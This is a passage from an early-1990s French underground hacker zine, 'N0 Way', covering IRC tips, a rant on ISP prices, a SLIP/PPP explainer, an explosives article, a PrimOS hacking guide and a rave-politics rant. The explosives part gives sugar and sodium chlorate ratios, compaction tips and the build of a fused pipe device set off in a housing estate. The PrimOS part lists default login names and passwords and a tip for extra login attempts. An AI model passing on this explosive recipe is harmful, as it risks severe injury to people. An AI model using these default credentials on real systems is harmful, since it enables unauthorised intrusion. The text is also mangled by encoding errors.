- ejecter quelqu'un du channel (/kick <nickname>)
|
|||
|
- modifier le sujet (topic) du channel (/topic #<channel> <new topic>)
|
|||
|
- rendre operateur quelqu'un d'autre (/mode +o <nickname>)
|
|||
|
- enlever l'operateur <20> quelqu'un (/mode -o <nickname>)
|
|||
|
- modifier les droits d'acces au channel (on peut banir du channel certainnes
|
|||
|
personnes, certainnes adresses etc...)
|
|||
|
|
|||
|
Quelques conseils:
|
|||
|
- - - - - - - - -
|
|||
|
Ne tapez pas tout ce que l'on vous dit de taper et surtout ne tapez
|
|||
|
pas des trucs du style /ON ou /EXEC car si vous etes sous Unix, cela vous fera
|
|||
|
executer des choses qui peuvent <20>tre des backdoor pour revenir sur votre suite
|
|||
|
ensuite.
|
|||
|
Evitez de faire chier les personnes avec un @ devant leur nom, ce sont
|
|||
|
les chanops!
|
|||
|
Avant d'utiliser un script Irc II que l'on vous envoie, verifiez bien
|
|||
|
qu'il ne contient pas de backdoor!
|
|||
|
|
|||
|
Voila !
|
|||
|
- - - -
|
|||
|
Vous voila pr<70>t pour aborder l'IRC sans difficult<6C>! Attention, on
|
|||
|
devient vite accro a ce service de l'internet.
|
|||
|
Peut etre demanderez vous un jour en vous debranchant de votre NeuroPrise (tm)
|
|||
|
"y a t'il une vie apr<70>s l'IRC?"
|
|||
|
|
|||
|
++NeurAlien.
|
|||
|
|
|||
|
| Internet for the masses |
|
|||
|
|
|||
|
La France <20>tait (JE DIS BIEN ETAIT) s<>rieusement dans la merde car
|
|||
|
aucun acces public <20> l'Internet n'<27>tait disponible <20> des prix abordables.
|
|||
|
Bien sur il y avait des passes droits accord<72>s <20> certains privil<69>gi<67> qui
|
|||
|
b<EFBFBD>n<EFBFBD>ficiaient de l'acces d'un universit<69> ou d'un institut pour utiliser
|
|||
|
Internet.
|
|||
|
|
|||
|
Depuis quelques mois, il semble que tout ait un peu chang<6E>.
|
|||
|
Il est apparu d'abord des services minitels proposant mail et news. Bien sur,
|
|||
|
ce genre de service est une vraie arnaque car il ne fournit pas quelque chose
|
|||
|
d'agr<67>able (vous avez deja les news a 1200/75 bauds????). De plus, ils se
|
|||
|
sont avere de qualit<69> assez m<>diocre. Pour n'en citer que quelques uns, ya
|
|||
|
TEASER et sa flopp<70>e de services parall<6C>le destin<69> <20> se faire du fric sans se
|
|||
|
pr<EFBFBD>ocupper des connect<63>s (Sniifff Sniiff... mais oui, je reconnais cette odeur
|
|||
|
de pourriture... mais c'est... c'est.... c'est J.. et C...) et les services
|
|||
|
EMAIL, INTERNET etc...
|
|||
|
|
|||
|
Ensuite ya des trucs largement plus serieux qui se sont mont<6E>. On a
|
|||
|
tout d'abord entendu parler de boites qui voulaient faire du dialup IP.
|
|||
|
Ma premi<6D>re r<>action a <20>t<EFBFBD>:
|
|||
|
"Et merde, ca y est, encore des arnaqueurs qui viennent squatter une de ces
|
|||
|
derniere place de libert<72> qu'est l'Internet".
|
|||
|
|
|||
|
Alors on a vu apparaitre en premier un truc appel<65> World-Net. Ne
|
|||
|
voulant pas juger <20> la l<>g<EFBFBD>re, j'ai demand<6E> des infos et voila:
|
|||
|
80 F de l'heure pour le Full IP (FTP, Telnet, Mosaic etc...)
|
|||
|
40 F de l'heure pour le Mail, News et IRC.
|
|||
|
Je me suis dit:
|
|||
|
"arghhh... putain c'est cher"
|
|||
|
Et quelle connerie j'ai dit la, j'avais pas vu ce qui suivait.
|
|||
|
Au mois de Juin et Juillet d'autres boites se sont fait connaitre:
|
|||
|
>FranceNet qui fait passer son service pour de l'internet alors que c'est juste
|
|||
|
un BBS connect<63> <20> l'internet qui ne permet pas de faire reellement du Dialup
|
|||
|
IP, bref, c'est vraiment pour le con moyen qui sait pas se servir de son
|
|||
|
clavier. En plus c'est hyper cher (36 68) et ca fonctionne tr<74>s mal!
|
|||
|
>Calvanet : alors la c'est une arnaque incroyable... meme pas la peine d'en
|
|||
|
parler. C'est la pourriture Calvacom revue et corrigee pour Internet.
|
|||
|
>France Telecom et leur service internet: si vous avez plus de 10 000 F par
|
|||
|
mois a mettre dans une liaison qui n'est meme pas permanent pour ce prix la,
|
|||
|
vous pouvez toujours tenter.
|
|||
|
J'ai rarement vu une boite qui ait le culot de faire cela quand meme! C'est
|
|||
|
une honte !
|
|||
|
|
|||
|
Bref, dans les 4 fournisseurs World-Net, francenet, calvanet et l'offre FT,
|
|||
|
c'est bien WorldNet qui est le moins cher.
|
|||
|
|
|||
|
Alors je recapitule les infos que j'ai eu sur eux (worldnet):
|
|||
|
>Pas d'abonnement.
|
|||
|
>Pour le Full IP : 80 F HT / heure
|
|||
|
>Pour le Mail, News et IRC: 40 F / heure
|
|||
|
pas d'autre frais. pas de frais <20> la mise en place. Ils peuvent fournir un
|
|||
|
package de communication pour PC ou Mac.
|
|||
|
|
|||
|
Bref... c'est pas les prix fabuleux qu'on pourrais avoir aux US mais c'est
|
|||
|
pas mal quand meme.
|
|||
|
|
|||
|
Voila, j'espere que ca vous <20>vitera de vous faire pieger. J'ai des potes
|
|||
|
pourtant pas trop naze qui se sont fait pieger par les arnaqueurs de
|
|||
|
Francenet. Ca semble ne rien couter car c'est en 36 68 (2.19F / minute) et
|
|||
|
quand tu recois la facture FT, il est deja trop tard !
|
|||
|
|
|||
|
Amusez vous bien avec Internet. ++NeurAlien.
|
|||
|
|
|||
|
P.S: J'ai une information tres tres tres interressante.
|
|||
|
WorldNet fait une "semaine Worldnet" avec Internet gratuit pour n'importe
|
|||
|
qui le demandant. C'est trop cool. Je me rappelle plus de la date mais
|
|||
|
ils ont un service qui informe la dessus, c'est le 3615 Worldnet ou le
|
|||
|
3617 SCT je crois.
|
|||
|
Je met les coordonn<6E>es de t<>l<EFBFBD>phone de cette boite:
|
|||
|
Tel: (1) 60 20 85 14
|
|||
|
Hehe... moi c'est sur, je vais demander un compte pour ce truc !
|
|||
|
|
|||
|
Disclaimer:
|
|||
|
J'en ai rien a foutre si mes propos font chier certainnes des boites
|
|||
|
mentionn<6E>es (francenet, WorldNet, Calvanet, France Telecom, teaser
|
|||
|
etc...). Ce que j'ai dit est vrai et si ca vous plait pas vous avez
|
|||
|
qu'a <20>tre honn<6E>tes vous aussi. Je ne suis pas un politicien donc j'en
|
|||
|
ai rien a cirer de l'avis des pseudo-VIP, je suis pas journaliste et
|
|||
|
ceci n'est pas un journal alors les proces en diffamations vous pouvez
|
|||
|
vous les mettre ou je pense.
|
|||
|
A bon entendeur salut! ++NeurAlien.
|
|||
|
|
|||
|
| Dialup IP |
|
|||
|
|
|||
|
Vous entendez parler partout de Dialup IP et vous ne savez pas ce que
|
|||
|
ca veut dire. Cette partie est sens<6E>e vous expliker cela!
|
|||
|
|
|||
|
Dans le temps, avant qu'Internet soit populaire, un vieux syst<73>me
|
|||
|
appel<EFBFBD> UUCP permettait de recevoir son mail et ses news par "<22> coups" car il
|
|||
|
fallait aller chercher ses informations sur le serveur et consulter en local.
|
|||
|
|
|||
|
Ensuite on a vu apparaitre pour les privil<69>gi<67> des acc<63>s shell sur des
|
|||
|
becannes reli<6C>es <20> l'Internet. A partir de la, on avait un terminal qui
|
|||
|
permettait d'utiliser tous les outils d'Unix pour se connecter sur l'Internet:
|
|||
|
telnet, FTP, IRC, gopher. Mais ca s'est vite trouv<75> d<>pass<73>. Par exemple, le
|
|||
|
World Wide Websted (WWW) qui est un ensemble de serveurs multim<69>dias reli<6C>s
|
|||
|
par des liens hypertexte et qui fonctionne en reseau ne peut fonctionner
|
|||
|
qu'avec un terminal ayant des capacite graphiques et sonores. Ce que
|
|||
|
generalement les terminaux n'ont pas!
|
|||
|
|
|||
|
Bref, il a fallu s'adapter, c'est pour cela que le SLIP puis le PPP
|
|||
|
ont <20>t<EFBFBD> cr<63><72>. Au lieu de se connecter avec un <20>mulateur de terminal sur un
|
|||
|
unix et de converser avec un Shell, la politique du SLIP & PPP est de
|
|||
|
transformer le flux de paquet venant de l'Internet en quelque chose que l'on
|
|||
|
peut passer sur le lien s<>rie du modem.
|
|||
|
|
|||
|
Donc PPP et SLIP servent <20> <20>muler en fait une liaison TCP/IP
|
|||
|
(protocole Internet) sur une communication modem. Bien sur, cette liaison
|
|||
|
n'est pas permanente.
|
|||
|
|
|||
|
Ainsi, on consid<69>re la machine de l'utilisateur comme un noeud
|
|||
|
temporaire d'un reseau connect<63> <20> Internet. Cette machine (qui peut <20>tre la
|
|||
|
votre) poss<73>de donc sa propre adresse. Il faut pour gerer ce flux de paquet
|
|||
|
qui transite <20> travers le modem un "Client" PPP ou SLIP qui retransforme ca en
|
|||
|
quelque chose d'exploitable par les "Clients" IRC, Mosaic (pour le WWW),
|
|||
|
Telnet, FTP, Gopher, Mail, News.
|
|||
|
(Le terme client d<>signe un programme qui va traiter l'information dispens<6E>e
|
|||
|
par un serveur centralis<69>).
|
|||
|
|
|||
|
Avec PPP et SLIP vous pouvez envoyer vos propre paquet. C'est un peu
|
|||
|
comme la victoire du combat qui se d<>roule sur le cable TV.
|
|||
|
Les grosses compagnies veulent un syst<73>me peu interactif qui permettra
|
|||
|
seulement d'acheter avec son num<75>ro de CB des programmes <20> la t<>l<EFBFBD>.
|
|||
|
Les cyberpunks veulent un truc totalement interactif qui permet de proposer
|
|||
|
soi m<>me ses propres service. SLIP et PPP vous permettent de proposer vos
|
|||
|
propres services <20> l'ensemble du monde. Bien sur ces services sont
|
|||
|
accessibles uniquement quand vous etes connect<63>.
|
|||
|
|
|||
|
Exemple pratique: emulation SLIP sous Windows.
|
|||
|
Vous avez un PC.
|
|||
|
Vous avez un modem 9600 minimum (19200 ou 28800 c'est le reve!).
|
|||
|
Vous avez les logiciels Trumpet et WinSock.
|
|||
|
Vous avez les clients Mail (Eudora), News, Mosaic, FTP etc...
|
|||
|
|
|||
|
Trumpet est le logiciel qui vous permet de vous connecter <20> un service vous
|
|||
|
fournissant du SLIP.
|
|||
|
WinSock permet d'<27>muler les sockets ("systeme de communication d'Internet"
|
|||
|
(c'est pas exactement ca)) sous Windows.
|
|||
|
Les clients exploitent les infos transmises par Trumpet puis WinSock.
|
|||
|
|
|||
|
sch<EFBFBD>ma:
|
|||
|
|
|||
|
____________________________________________
|
|||
|
| Client | Client | Client | Client | Client |
|
|||
|
| Mail | FTP | Mosaic | News | Irc |
|
|||
|
|(eudora)| | | | |
|
|||
|
|--------+--------+--------+--------+--------|
|
|||
|
| |
|
|||
|
| WinSock |
|
|||
|
| ( transforme les infos fournie par Trumpet |
|
|||
|
| en sockets exploitable par les clients ) |
|
|||
|
|--------------------------------------------|
|
|||
|
| |
|
|||
|
| Trumpett |
|
|||
|
| ( assure la cnx SLIP et la reception des |
|
|||
|
| paquets TCP/IP ) |
|
|||
|
|--------------------------------------------|
|
|||
|
| |
|
|||
|
| couche Hard |
|
|||
|
| communication modem en s<>rie |
|
|||
|
| |
|
|||
|
--------------------------------------------
|
|||
|
|
|||
|
L'avantage avec ce syst<73>me est que l'on peut utiliser plusieurs
|
|||
|
clients en m<>me temps: FTP, News et Mosaic par exemple.
|
|||
|
|
|||
|
C'est TRES TRES pratique.
|
|||
|
|
|||
|
Eh bien c'est sur ces mots que je referme la section "du cot<6F> d'internet".
|
|||
|
|
|||
|
++NeurAlien
|
|||
|
|
|||
|
|
|||
|
-%!% N0 Way %!%-
|
|||
|
|
|||
|
Volume I, Num<75>ro 3, Partie 3.14
|
|||
|
|
|||
|
|
|||
|
[ Petite pr<70>cision sur les explosifs:
|
|||
|
Ce que je vais dire, tout le monde le sais: Les explosifs sont TRES dangereux.
|
|||
|
Mais bon, on se dit: ouais, je vais assurer etc... mais ca c'est du N'IMPORTE
|
|||
|
QUOI ! On ne maitrise jamais totalement ce genre de produit (m<>me les
|
|||
|
artificiers professionels).
|
|||
|
Un explosif amateur a un probleme: il n'est presque jamais stable, par contre
|
|||
|
il est en g<>n<EFBFBD>ral aussi fort que les explosifs professionels. Donc, il faut que
|
|||
|
vous sachiez que chaque ann<6E>e il y a entre 10 et 100 gosse qui garderont a vie
|
|||
|
des sequels de ce genre de connerie. (j'ai un ami qui doit tout le temps porter
|
|||
|
des gants car sinon c'est vraiment pas beau!).
|
|||
|
DECONNEZ PAS, faites vos m<>langes en petite quantit<69> et n'oubliez pas:
|
|||
|
ce genre de m<>lange peut <20>tre MORTEL ! ++NeurAlien.]
|
|||
|
-----------
|
|||
|
|
|||
|
L'explosif ? tient tient...
|
|||
|
|
|||
|
|
|||
|
Ce jour la j'etais sceptique, on m'avait dit qu'un simple melange de sucre et de
|
|||
|
desherbant (chlorate de soude) suffisait a faire de l'explosif. Au fait, sur les
|
|||
|
paquet de petards, vous n' avez vous jamais lu 'Ne contient ni chlorate, ni
|
|||
|
perchlorate' ? La tentation fut forte, et j'achetais le jour suivant les
|
|||
|
ingredients...
|
|||
|
|
|||
|
Premiere preparation, quelques grammes, moitier sucre, moitier chlorate.
|
|||
|
J'allume. Stupefaction, ca brulait tres vivement, une flamme jaune extremement
|
|||
|
lumineuse, pendant quelques secondes, en meme temps ca degageait une fumee
|
|||
|
blanche tres epaisse avec une odeur de caramel. (la decomposition spectrale est
|
|||
|
en fait celle du sodium, 2 raies jaunes). Le melange a l'etat brute ne fait que
|
|||
|
bruler a l'air libre. On dit que le compose fuse.
|
|||
|
|
|||
|
Pour l'utiliser en explosif il fallait donc enfermer le melange dans un tube.
|
|||
|
J'avais confectionne un tube ouvert d'un cote, et que l'on pouvait ferme de
|
|||
|
l'autre. J' y mettais dedans les celebres Mammouths. Du cote ouvert on pouvait
|
|||
|
placer un projectile qui entrait dans le tube. Lorsque le petard claquait le
|
|||
|
projectile ( ecrou + boulon qui bouchait bien l'entree ) etait expulse avec une
|
|||
|
force suffisante pour percer une plaque de fer de 1/2 mm d'epaisseur. Bien sur
|
|||
|
il me fallut peu de temps pour remplacer les Mammouths par le melange. J'avais
|
|||
|
tasse au fond du tube une epaisseur de peut etre 5mm. Un trou dans le fond du
|
|||
|
tube laissait passer une meche de petard, ce qui declancherais l'explosion
|
|||
|
J'essaie. La detonnation fut sourde et grave, on sentait l'onde de choc. Le
|
|||
|
fond du tube etait finalement eventre, decapite et plie en arcordeon rien qu'
|
|||
|
avec la force du recule du tube lorsqu'il cogna dans un mur. Surpennant, avec si
|
|||
|
peu de poudre...
|
|||
|
|
|||
|
Afin de perfectionner l'explosif, je fit quelques recherches. Meme le prof de
|
|||
|
physique s'y etait mis ! Un sacre lascar du Cnrs d'ailleurs.
|
|||
|
|
|||
|
En voici les resultats:
|
|||
|
|
|||
|
Les meilleurs performances sont obtenues en melangeant 2/3 de sucre glace et
|
|||
|
1/3 de chlorate en poids. Pour afiner les rapports il suffit de regarder ce qui
|
|||
|
reste apres que l'on est fait fuser le melange: Reste du rose coulant -> un peu
|
|||
|
trop de chlorate. Reste noir bousoufle -> trop de sucre. Ce melange augemente
|
|||
|
ces performances lorsqu'il est humide au toucher. Il ne doit surtout pas etre
|
|||
|
coulant. Il ne craint donc absolument pas l'humidite, au contraire. Le fin du
|
|||
|
fin c'est de combiner de l'huile de vaseline. (Quasiment tous les explosifs pro
|
|||
|
contiennent de l'huile de vaseline, mais cette operation est delicate a
|
|||
|
realiser). Plus le melange est tasse plus ca pete fort. Ceci est en fait tres
|
|||
|
important. Apres l'avoir tasse, ca doit etre un bloque dur. Pour le faire,
|
|||
|
n'utilisez pas d'etau, de pinces etc..!!!! Ca vous peterait a la gueule, avant
|
|||
|
meme d'avoir dit 'ouf..'
|
|||
|
|
|||
|
Il est important de remarquer que le melange fuse a partir de 50 degre C ! Le
|
|||
|
melange est tellement instable, qu'il n'y a pas besoin de flamme pour que ca
|
|||
|
demarre. Ceci explique aussi pourquoi il est sensible aux chocs (le choc
|
|||
|
provoque un petit echauffement en un point, meme tres faible), donc attention
|
|||
|
!!! pas de brutalite. Enfin le melange devient de plus en plus instable au cours
|
|||
|
du temps s'il est tasse. Apres 24h, ca devient dangereux et risque de bruler (ou
|
|||
|
peter) tout seul. On utilise au fur et a mesure qu'on fabrique. Une solution
|
|||
|
pour en garder consiste a humudifier le melange, et le stocker dans un
|
|||
|
congelateur a -18 deg. Mais mieux vaut l'eviter si on peut.
|
|||
|
|
|||
|
Apres la parfaite maitrise, je confectionnais un gros petard, avec 100 grammes
|
|||
|
de melange tasse dans un bout de cadre de velo decoupe et ferme au bout a la
|
|||
|
presse prealablement percer pour laisser passer une meche. -----> Ne percer pas
|
|||
|
apres avoir mis le melange et fo prendre la precaution de mettre du papier
|
|||
|
mouchoir ou Wc au bout du tube, afin d'etre sur que l'on ne presse pas le
|
|||
|
melange !!!!!!!! Operation termine, je vais a la ZUP, ou les petards n'inquiete
|
|||
|
depuis longtemps plus personne et ou la police ne vient pas. Je le pose sur une
|
|||
|
plaque en beton des telecoms. J'allume la meche et je me retire mine de rien. De
|
|||
|
toute ma vie je n'ai jamais entendu une telle detonnation ! Ce n'est pas
|
|||
|
comparable, si bien qu'il m'ai tres difficile de la decrire. A entendre le bruit
|
|||
|
j'ai pense que les plaques de beton de largement plus de 100kg et de 10cm
|
|||
|
d'epaisseur etait integralement pulverisees. C'est une detonnation qui ne fait
|
|||
|
pas mal aux oreilles. C'est un bruit tres puissant, tres sourd et tres grave,
|
|||
|
un peu comme un coup de tonner ne fait pas mal aux oreilles. C'etait encore plus
|
|||
|
grave, et certainement 10 fois plus forts ! Je crois qu'on arrive pas a se le
|
|||
|
representer. Mais surtout ne vous bouche pas les oreilles ! Apres la detonnation
|
|||
|
une grande fumee blanche se dissipa. Imaginer la tete des gens, on pense a un
|
|||
|
attentat. D'ailleurs dans la minute qui suivit la detonnation personne n'a
|
|||
|
ouvert la fenetre. L'onde de choc n'a heuresement pas brisee de vitres.
|
|||
|
|
|||
|
|
|||
|
C'est ensuite seulement qu'on se dit, j'ai pris ca dans les mains, je l'ai
|
|||
|
transporte dans un sac en plastique (jamais ds les poches), mais j'ai ete dingue
|
|||
|
Vraiment si on s'imaginait la force que ca peut avoir, personne n'aurait le
|
|||
|
courage d'en faire, et de loin ! On c'est bien marre, on a fait du 0 erreur, on
|
|||
|
a eu beaucoup de chance, tout simplement. Se ne sont pas des choses qu'il faut
|
|||
|
refaire a tour de bras. Faut etre raisonnable et lucide, a vous de voir.
|
|||
|
|
|||
|
|
|||
|
A bon entendeur, salut !...
|
|||
|
By Inlandsis.
|
|||
|
|
|||
|
|
|||
|
-%!% N0 Way %!%-
|
|||
|
|
|||
|
Volume I, Num<75>ro 3, Partie 3.15
|
|||
|
|
|||
|
|
|||
|
Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
|
|||
|
diffuse publiquement.
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
= CORE-DUMP Issue 1 Phile 3 [NeurAlien] 13/01/92 =
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
|
|||
|
/@@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@\
|
|||
|
@/ \@
|
|||
|
@ Prime & the PrimOS Environment @
|
|||
|
@ @
|
|||
|
@ par @
|
|||
|
@ @
|
|||
|
@ NeurAlien @
|
|||
|
@\ /@
|
|||
|
\@@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@/
|
|||
|
|
|||
|
|
|||
|
Le Prime est un ordinateur a mi-chemin entre le gros ordinateur de
|
|||
|
traitement lourd et l'ordinateur de gestion de conception plus legere.
|
|||
|
Son systeme d'exploitation s'appelle le PrimOS et est un systeme proprietaire.
|
|||
|
Il est multi-utilisateur et possede plusieurs modules des l'origine:
|
|||
|
un module Basic, un autre de programmation pseudo-shell (batch) etc...
|
|||
|
Le prime possede de nombreuses failles de securite. Notemment dans le
|
|||
|
programme tour.
|
|||
|
|
|||
|
>L'acces au Prime:
|
|||
|
=================
|
|||
|
L'acces au Prime se fait par une base d'acces d'o<> l'on peut lancer des
|
|||
|
commandes de pre-login appelee PrimeNet. C'est en fait comme un service
|
|||
|
d'accueil et de dispatching avec une machine par defaut.
|
|||
|
Les prompts utilis<69> par le syst<73>me de pr<70>login sont 'OK' et 'ER!'.
|
|||
|
'OK' est affich<63> en premier, si vous tapez quelque chose d'incorrect, le Prime
|
|||
|
vous r<>pondra par un 'ER!'.
|
|||
|
La banni<6E>re ressemble a :
|
|||
|
"Primenet V2.3"
|
|||
|
Un message souvent vu sur Prime est:
|
|||
|
Please Login
|
|||
|
ER!
|
|||
|
|
|||
|
Cela veut dire que vous vous etes plante dans la commande et qu'il faut taper
|
|||
|
login:
|
|||
|
|
|||
|
Primenet V 2.3 (system)
|
|||
|
LOGIN<CR> (vous)
|
|||
|
User id? (system)
|
|||
|
AA1234 (vous)
|
|||
|
Password? (system)
|
|||
|
KILLME (vous)
|
|||
|
OK, (system)
|
|||
|
|
|||
|
La principale commande etant bien s<>r login.
|
|||
|
syntaxe: login [<user>] [<password>] [-ON <host>] [-PROJECT <project_id>]
|
|||
|
Le nom user est ecrit en majuscule comme la pluspart des commandes en PrimOS
|
|||
|
d'ailleur. Une fonction interressante de PrimeNet est de pouvoir se logger
|
|||
|
sur une machine autre que celle par defaut sans pour autant avoir a se logger
|
|||
|
sur la machine par defaut.
|
|||
|
|
|||
|
Il vaut mieux essayer plusieurs logins par la commande
|
|||
|
login <user> <password>
|
|||
|
comme ca vous avez 3 essais au lieu d'un essai.
|
|||
|
|
|||
|
>Le systeme d'exploitation du Prime, PrimOS:
|
|||
|
===========================================
|
|||
|
La version actuelle de PrimOS doit etre la 22 ou la 23.
|
|||
|
|
|||
|
>Les commandes d'utilisation courante du systeme:
|
|||
|
================================================
|
|||
|
status users \_ : Affiche la liste des users, leur origine, leur etat
|
|||
|
us /
|
|||
|
all \_ : Affiche des infos sur toutes les activites du
|
|||
|
al / systeme
|
|||
|
comm : decrit les controlleurs de communication et leurs
|
|||
|
etats respectifs.
|
|||
|
devices : donne des informations sur les peripheriques
|
|||
|
disks \_ : donne des informations sur les disques
|
|||
|
di /
|
|||
|
me : donne des infos sur soi meme.
|
|||
|
network \_ : donne des infos sur les differents noeuds du reseau
|
|||
|
net / PrimeNet.
|
|||
|
project \_ : donne des infos sur les projets sur users
|
|||
|
pro /
|
|||
|
system \_ : donne des infos sur le PrimOS en train de tourner.
|
|||
|
sys /
|
|||
|
semaphores \_ : donnes des infos sur les semaphores actives
|
|||
|
se /
|
|||
|
units \_ : donne des infos sur les units ouverts
|
|||
|
un /
|
|||
|
|
|||
|
listf \_ : donne le nom du dir, le peripherique et si on a des
|
|||
|
l / ACLs dessus ou non.
|
|||
|
|
|||
|
slist <pathname> : affiche le fichier a l'ecran
|
|||
|
|
|||
|
login [<user>] [<password>] [-ON <host>] [-PROJET <projet_id>]
|
|||
|
: ouvre un log sur la machine specifiee ou definie par
|
|||
|
defaut avec le password et le projet specifie ou par
|
|||
|
defaut.
|
|||
|
|
|||
|
date : affiche la date et l'heure
|
|||
|
|
|||
|
time : affiche les valeurs du registre de temps partage:
|
|||
|
. connect time : temps depuis le login
|
|||
|
. compute time : temps d'utilisation de
|
|||
|
programmes
|
|||
|
. I/O : temps d'utilisation d'un
|
|||
|
Disk, Controlleur de comm ou
|
|||
|
Device.
|
|||
|
|
|||
|
|
|||
|
>Les communications:
|
|||
|
===================
|
|||
|
Les communications x25 se font par l'intermediaire de netlink qui est un
|
|||
|
programme de communication.
|
|||
|
on l'appelle comme suit:
|
|||
|
netlink<cr>
|
|||
|
Ce programme est en fait un sous systeme. Il vous reponds alors le prompt '>'.
|
|||
|
Ici vous pouvez tapper diverses commandes:
|
|||
|
c <DNIC>:<NUA> : appelle en collective call le NUA
|
|||
|
nc <DNIC>:<NUA> : appelle normalement le NUA
|
|||
|
|
|||
|
>Les logins par defaut:
|
|||
|
======================
|
|||
|
User ids: Passwords:
|
|||
|
--------- ----------
|
|||
|
Admin
|
|||
|
Games
|
|||
|
Tools
|
|||
|
Rje
|
|||
|
Netman
|
|||
|
Cmdnco
|
|||
|
Demo
|
|||
|
Regist
|
|||
|
Prirun
|
|||
|
Telenet
|
|||
|
mail mail
|
|||
|
prime prime / primos
|
|||
|
primos_cs prime / primos
|
|||
|
Primos
|
|||
|
primenet primnet
|
|||
|
mfd mfd
|
|||
|
fam fam / Ver. 18 Primos \
|
|||
|
system system < et en dessous >
|
|||
|
dos dos \ --------- /
|
|||
|
tele tele
|
|||
|
netlink netlink
|
|||
|
test test
|
|||
|
guest guest
|
|||
|
guest1 guest1/guest
|
|||
|
|
|||
|
>le mot de la fin:
|
|||
|
=================
|
|||
|
Ya pas mal de syst<73>me Prime qui sont encore TRES ouverts <20> tout type de
|
|||
|
p<EFBFBD>n<EFBFBD>trations (hahaha). Alors pour les bons petits PADs tranquile, c'est kewl!
|
|||
|
NeurAlien.
|
|||
|
------------------
|
|||
|
S0, G0 0N wif N0 Way !
|
|||
|
|
|||
|
|
|||
|
-%!% N0 Way %!%-
|
|||
|
|
|||
|
Volume I, Num<75>ro 3, Partie 3.16
|
|||
|
|
|||
|
|
|||
|
<<</\[..]/\[..]/\[..]/\[..]/\[..]/\>>>
|
|||
|
</' `\>
|
|||
|
<\ Rave Revolt />
|
|||
|
<\ \>
|
|||
|
<<</\[..]/\[..]/\[..]/\[..]/\[..]/\>>>
|
|||
|
|
|||
|
-
|
|||
|
PART I
|
|||
|
-
|
|||
|
|
|||
|
Arggghhhhhhh!!!!! C'est le cri de la bete qui se reveille!
|
|||
|
|
|||
|
NON, je n'y crois pas, ce que je redoutais est arriv<69>: ce havre de repos
|
|||
|
qu'etait le pont de Tolbiac a ete viol<6F>. Le sanctuaire a <20>t<EFBFBD> profan<61> par de
|
|||
|
sales CRS baveux et grognants avides de baston. C'est vraiment le genre de
|
|||
|
trucs qui m'ecoeurent: ils sont venus faire chier gratuitement des ravers
|
|||
|
simplement car c'<27>tait pas d<>clar<61>. Encore cet encul<75> de Pasqua qui s'est
|
|||
|
dit: "Hey merde, ils s'amusent bien l<> bas et ils sont pas emmerd<72>s par les
|
|||
|
flics car ils ne g<>nent personne".
|
|||
|
|
|||
|
Solution: hop, on se renseigne avec les RG et autres encul<75>s civils puis on
|
|||
|
leur envoie les CRS.
|
|||
|
|
|||
|
Bravo pour les m<>thodes... C'est d'une finesse....
|
|||
|
|
|||
|
Alors maintenant qu'ils ont fini de faire chier les raves ils commencent a
|
|||
|
d<EFBFBD>ranger les afters: RI-DI-CULES !
|
|||
|
|
|||
|
Il paraitrait m<>me qu'il est question d'interdire les raves au plan national.
|
|||
|
La va falloir se secouer car les raisonnements pr<70>c<EFBFBD>dents ne peuvent plus
|
|||
|
s'appliquer: on pensait que l'interdictions des raves commerciales permettrait
|
|||
|
<EFBFBD> l'underground de se developper. Que nenni, ils s'attaquent directement <20>
|
|||
|
l'underground!
|
|||
|
|
|||
|
Quelle sera la prochaine <20>tape?
|
|||
|
|
|||
|
L'interdiction de TNT?
|
|||
|
L'arrestation des organisateurs des raves?
|
|||
|
(ca serait pas un mal pour E+ et d'autres...)
|
|||
|
|
|||
|
Il va falloir r<>agir contre toutes ces pouss<73>es s<>curitaires et anti-
|
|||
|
d<EFBFBD>mocratiques. Nous y contribuons d<>ja en diffusant No Way un peu partout!
|
|||
|
|
|||
|
-
|
|||
|
PART II
|
|||
|
-
|
|||
|
|
|||
|
Le Teknival UFO 23 du massif central a lui aussi <20>t<EFBFBD> g<>n<EFBFBD> par les keufs
|
|||
|
une nouvelle fois.
|
|||
|
|
|||
|
Au d<>but, tout se passait bien: le Teknival avait <20>t<EFBFBD> install<6C> dans un
|
|||
|
champ pr<70>t<EFBFBD> aux organisateurs par un agriculteur du coins.
|
|||
|
|
|||
|
Tout se passait bien, a des kilometres des habitations. Pourtant, il y
|
|||
|
a eu DES PLAINTES. Les gendarmes venaient <20> l'entr<74>e du champs presque tous
|
|||
|
les jours pour se renseigner aupr<70>s des organisateurs. Le maire voulait virer
|
|||
|
le teknival de sa commune. Le maire biensur n'y est pas arriv<69>. Ils ont donc
|
|||
|
transmis l'affaire au prefet etc... Bref, comment faire chier pour rien les
|
|||
|
ravers qui ne g<>naient personne.
|
|||
|
|
|||
|
On se balade dans le Teknival, a la recherche de bois pour le feu ou de
|
|||
|
feu pour nos t<>tes ;) et <20> chaque fois on entendait:
|
|||
|
"Il parait qu'ils vont envoyer les CRS".
|
|||
|
|
|||
|
De charge de CRS, il n'y en a pas eu (a ma connaissance), par contre
|
|||
|
ces personnes mal avis<69>es se sotn permise de filtrer <20> la fin du Teknival
|
|||
|
l'entr<74>e au champ, ne laissant pas entrer les gens mais les laissant sortir.
|
|||
|
Le champs s'est ainsi "vid<69>" au fur et <20> mesur des voyages.
|
|||
|
|
|||
|
La m<>me <20>ternelle question se pose encore,
|
|||
|
|
|||
|
Mais que veulent ils?
|
|||
|
++N.
|
|||
|
|
|||
|
-%!% N0 Way %!%-
|
|||
|
|
|||
|
Volume I, Num<75>ro 3, Partie 3.17
|
|||
|
|
|||
|
|
|||
|
Cet article est un article de CORE-DUMP, journal Underground Hacker jamais
|
|||
|
diffuse publiquement.
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
= CORE-DUMP Issue 1 Phile 5 [NeurAlien] 14/01/92 =
|
|||
|
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
|
|||
|
|
|||
|
|
|||
|
